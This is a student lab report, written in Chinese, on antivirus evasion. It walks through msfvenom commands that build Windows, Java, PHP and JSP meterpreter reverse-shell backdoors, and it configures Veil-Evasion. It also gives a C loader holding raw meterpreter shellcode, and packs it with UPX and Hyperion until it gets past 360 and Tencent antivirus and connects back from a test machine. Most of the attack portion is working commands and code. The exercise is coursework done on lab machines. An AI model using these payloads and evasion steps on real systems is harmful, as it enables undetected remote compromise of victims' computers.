2018-2019-2 網絡對抗技術 20165210 Exp3 免殺原理與實踐

免殺的概述

免殺，也就是反病毒(AntiVirus)與反間諜(AntiSpyware)的對立面，英文為Anti-AntiVirus(簡寫Virus AV)，逐字翻譯為"反-反病毒"，翻譯為"反殺毒技術"。單從漢語"免殺"的字面意思來理解，可以將其看為一種能使病毒木馬避免被殺毒軟件查殺的技術。免殺這裏有關於免殺的介紹和發展史及一些免殺技巧。

基礎問題回答

• 殺軟是如何檢測出惡意代碼的？

1. 惡意代碼中一般會有一段有較明顯特征的代碼也就是特征碼，如果殺毒軟件檢測到有程序包含的特征碼與其特征碼庫的代碼相匹配，就會把該程序當作惡意軟件。
2. 假如程序修改了註冊表、修改了權限等惡意行為，就會被殺軟查到。

• 免殺是做什麽？

1. 通過一些修改技術手段來逃避殺毒軟件的檢測掃描。

• 免殺的基本方法有哪些？

1. 修改特征碼：
   加殼，通過加殼，讓殺毒軟件無法進行反匯編、逆向工程，進而無法分析代碼、對shellcode進行編碼、重組。

2. 修改惡意行為：
   多使用反彈式連接，使用加密技術隱藏，加入正常代碼來掩蓋惡意代碼，隧道技術。

   實驗內容

   一、正確使用msf編碼器，msfvenom生成如jar之類的其他文件，veil-evasion，加殼工具，使用shellcode編程

   1.1正確使用msf編碼器

• 把實驗二中生成的後門放入VirusTotal網站下掃描結果如下：
  

  

• 可以看出不做處理的後門可以被大多數的殺軟檢測到，那麽我們試一下編碼後呢：

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.16.132 LPORT=5210 -f exe > 20165210-1.exe

• 發現並沒有什麽卵用，那麽我們只好加大量，編碼十次，come on！

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.16.132 LPORT=5210 -f exe > 20165210-10.exe
 

• omg，沒什麽改變，以為整錯了，做了一遍發現還是這樣，所以說免殺並不是簡簡單單就能實現，但是為什麽編碼降低了檢出率還不行呢？AV廠商也不傻，人家研究的是編碼器本身，shikata_ga_nai總會有解碼(decoder stub)部分需要加入的exe中，只要盯住這部分就可以了。

  1.2msfvenom生成如jar之類的其他文件

  - msfvenom生成jar文件

  生成Java後門程序使用命令：

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.16.132 LPORT=5210 x> 20165210_java.jar

掃描如下：

- msfvenom生成php文件

生成PHP後門程序使用命令：

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.16.132 LPORT=5210 x> 20165210_php.php

掃描如下：

- msfvenom生成jsp文件

生成JSP後門程序使用命令：

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.16.132 LPORT=5210 -f raw > 20165210_jsp.jsp

掃描如下：

1.3使用veil-evasion

這裏安裝參考了學長的博客
如果直接使用

sudo apt-get install veil-evasion

可能會在安裝過程中丟失一些壓縮包。
可使用以下命令完整安裝Veil-Evasion。

echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
sudo apt-get update
sudo apt-get install veil-evasion

在終端下輸入指令 veil 即可打開軟件，按y開始安裝，結果如圖所示：

根本進行不了，一直卡在16%，要不就是卡在25%，安裝失敗，只能去拷一下別人的虛擬機了，真的是崩潰，用了成功的虛擬機打開了veil

用

use evasion

命令進入Evil-Evasion

用命令

use c/meterpreter/rev_tcp.py

進入配置界面

設置反彈連接IP，命令為：

set LHOST 192.168.199.198

，註意此處的IP是KaliIP
設置端口，命令為：set LPORT 5210

輸入generate生成文件，接著輸入你想要playload的名字：playload5210

按照路徑找到文件掃描試一下

咦，還不錯。

1.4編寫註入Shellcode並執行

首先使用命令：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.198 LPORT=5210 -f

c用c語言生成一段shellcode，創建一個文件20165318.c，然後將unsigned char buf[]賦值到其中，代碼如下：

unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\xc7\xc6"
"\x68\x02\x00\x14\x5a\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

int main()
{
    int (*func)() = (int(*)())buf;
    func();
}

使用命令：

i686-w64-mingw32-g++ 20165210.c -o 20165210.exe

編譯這個.c文件為可執行文件

然後把可執行文件掃描一下如圖：

1.5使用加殼試一下

• 壓縮殼（UPX）
  給之前的20165318.exe加個殼得到20165210-jk.exe：

upx 20165210.exe -o 20165210-jk.exe

掃描一下

• 加密殼Hyperion
  將20165210-jk.exe目錄/usr/share/windows-binaries/hyperion/中
  輸入命令

wine hyperion.exe -v 20165210-jk.exe 20165210_Hyperion.exe

進行加殼

掃描一下

二、通過組合應用各種技術實現惡意代碼免殺

首先用C語言生成一段shellcode，然後將C語言文件變成可執行文件，然後進行加殼，先進行壓縮殼，然後進行加密殼（具體操作可看上面任務一）
然後進行查殺如圖：
360查殺：

騰訊管家查殺：

yeah成功免殺！但是很有趣的是，這些殺軟都是只在第一次掃描不出來，你再次查殺是就會被發現，很意外，但是一想這些360什麽的軟件又不是傻瓜殺軟（比如江民殺軟哈哈哈哈哈）我覺得可能是什麽雲病毒的這個特征庫的更新有關吧，也不是太清楚。

三、用另一電腦實測，在殺軟開啟的情況下，可運行並回連成功，註明電腦的殺軟名稱與版本

對方電腦的版本：Windows 7x64 虛擬機

殺軟名稱版本：騰訊管家13.0.19837.233

實驗的步驟和上面一樣，實現免殺如圖：

實現反彈連接：

四、實驗的心得與體會

1. 這個實驗做得真的是十分的曲折，首先就是安裝veil，真的太困難了，真的卡在了展開對象25%那裏了，一晚上都沒動，重新再安裝的時候直接把kali卡黑屏，然後重啟kali就一直彈用戶名密碼進不去，然後再過一會電腦直接藍屏，omg，直接重啟了進入了bios，崩潰，只能再拷一下虛擬機
2. 接下來就是有個疑問就是為什麽第一次殺軟查不出來，第二次掃描就掃描出來了。
3. 還有就是加殼強！！！哈哈哈
4. 總結

2018-2019-2 網絡對抗技術 20165210 Exp3 免殺原理與實踐